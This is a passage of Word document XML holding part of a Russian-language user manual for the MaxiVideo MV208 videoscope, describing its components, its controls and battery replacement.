      <w:r w:rsidRPr="00233B41">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>видеоскопа</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Примечание. Вследствие непрерывной реализации улучшений фактический </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>внешний вид видеоскопа может отличаться от внешнего вида, показанного на рисунке.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Видеоскоп MaxiVideo™ MV208 поставляется вместе со следующими компонентами:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251661824" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2344420</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-50165</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3061335" cy="2701925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1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61335" cy="270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pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pP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tab/>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Портативное устройство отображения информации </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>- эргономичный прибор, обладающий удобной конструкцией в виде пистолетной</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>рукоятки.</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Видеоголовка и зонд </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>- подключаются к видеоскопу при необходимости получения фотографий и видеозаписей для осматриваемого</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>объекта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2478"/>
          <w:tab w:val="left" w:pos="3291"/>
          <w:tab w:val="left" w:pos="3586"/>
          <w:tab w:val="left" w:pos="4821"/>
          <w:tab w:val="left" w:pos="6283"/>
          <w:tab w:val="left" w:pos="6967"/>
          <w:tab w:val="left" w:pos="7288"/>
          <w:tab w:val="left" w:pos="9030"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Соединитель</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
        <w:t>зонда</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:tab/>
        <w:t>позволяет</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:tab/>
        <w:t>подключить</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:tab/>
        <w:t>зонд</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:tab/>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:tab/>
        <w:t>видеоголовкой</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:tab/>
        <w:t>к портативному устройству отображения</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>информации.</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Индикатор электропитания </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>- светится зеленым светом после включения электропитания</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>видеоскопа.</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Кнопка электропитания </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>- включает/отключает</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>видеоскоп.</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Разъем видеовыхода </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>- позволяет подключить видеоскоп к телевизору с помощью видеокабеля, входящего в комплект поставки, если необходимо отображать в реальном времени изображение обследуемого</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>объекта.</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Разъем мини-USB </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>- позволяет подключить видеоскоп к компьютеру с помощью USB-кабеля, входящего в комплект</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>поставки.</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Разъем для карты памяти SD </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>- позволяет подключить к видеоскопу карту памяти Micro</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>SD.</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Крышка отсека для батареек </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>- позволяет установить или извлечь</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>батарейки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251662848" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2767330</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>207645</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2058035" cy="589280"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="17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58035"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Насадка с магнитом </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>- притягивает небольшие металлические предметы, такие как кольца или</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>винты.</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Насадка с крюком </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>- помогает устранять препятствия и смещать провода в трубах или ограниченных</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>пространствах.</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Насадка с зеркалом </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>- помогает заглядывать за углы и в труднодоступные места.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00164BF4" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Кнопки и элементы</w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>управления</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251663872" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2933700</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>136525</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1996440" cy="2226310"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1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6440"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ЖК-дисплей </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>- отображает изображения и</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>видеозаписи.</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удаления/поворота </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>- удаляет полученные фотоснимки и видеозаписи в режиме воспроизведения. Нажатие кнопки поворота во время фотосъемки или записи видео изменит ориентацию изображения, отображаемого на экране в режиме реального времени. Изображение фотоснимков и видеозаписей можно поворачивать с шагом 90 градусов.</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воспроизведения </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>- воспроизводит ранее сохраненные фотоснимки и видеозаписи.</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настройки/возврата </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>- отображает окно основных параметров. Повторное нажатие позволяет вернуться к предыдущему просматриваемому</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-25"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>экрану.</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фото-/видеокамеры </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t xml:space="preserve">- позволяет переключаться между двумя </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:lastRenderedPageBreak/>
        <w:t>режимами: фотосъемка или</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>видеозапись.</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регулировки масштаба (стрелка вверх) </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>- используется для увеличения масштаба изображения в режиме фотосъемки. В режиме меню используется для перемещения вверх при навигации по пунктам меню и</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>подменю.</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регулировки масштаба (стрелка вниз) </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>- используется для уменьшения масштаба изображения в режиме фотосъемки. В режиме меню используется для перемещения вниз при навигации по пунктам меню и</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>подменю.</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регулировки светодиодной подсветки (стрелка влево) </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>- используется для уменьшения яркости светодиодной подсветки в режиме фотосъемки. Перемещает курсор на требуемый элемент интерфейса. Также позволяет перейти к предыдущему изображению или видео в режиме</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>воспроизведения.</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регулировки светодиодной подсветки (стрелка вправо) </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>- используется для увеличения яркости светодиодной подсветки в режиме фотосъемки. Перемещает курсор на требуемый элемент интерфейса. Также позволяет перейти к следующему изображению или видео в режиме</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>воспроизведения.</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OK </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>- подтверждает выбор (или действие) пункта меню. Начинает фотосъемку или видеозапись в режиме осмотра. Запускает или приостанавливает просмотр файлов в режиме</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>воспроизведения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00164BF4" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_bookmark10"/>
      <w:bookmarkEnd w:id="68"/>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сборка и</w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>подключение</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00164BF4" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_bookmark11"/>
      <w:bookmarkEnd w:id="69"/>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Извлечение и установка</w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>батареек</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Примечание. Если индикатор электропитания мигает непрерывно, необходимо своевременно заменить батарейки согласно инструкциям.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251664896" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2637790</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>122555</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2279650" cy="1330325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="16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965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C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:t xml:space="preserve">Поверните рукоятку видеоскопа нижней стороной вверх, чтобы получить доступ к винту и крышке отсека батареек. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:t>С помощью отвертки выкрутите винт, а затем снимите крышку отсека</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>батареек.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:t>Выполните процедуру замены</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>батареек.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="002C1237" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251665920" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3127375</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>175260</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1464945" cy="1133475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1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494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2F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Откройте крышку отсека внизу рукоятки, извлеките из отсека держатель батареек, а затем вытащите батарейки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="3894"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:t>Вставьте в держатель батареек 4 (четыре) элемента питания типа АА, после чего поместите держатель с батарейками в отсек внизу рукоятки</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>видеоскопа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
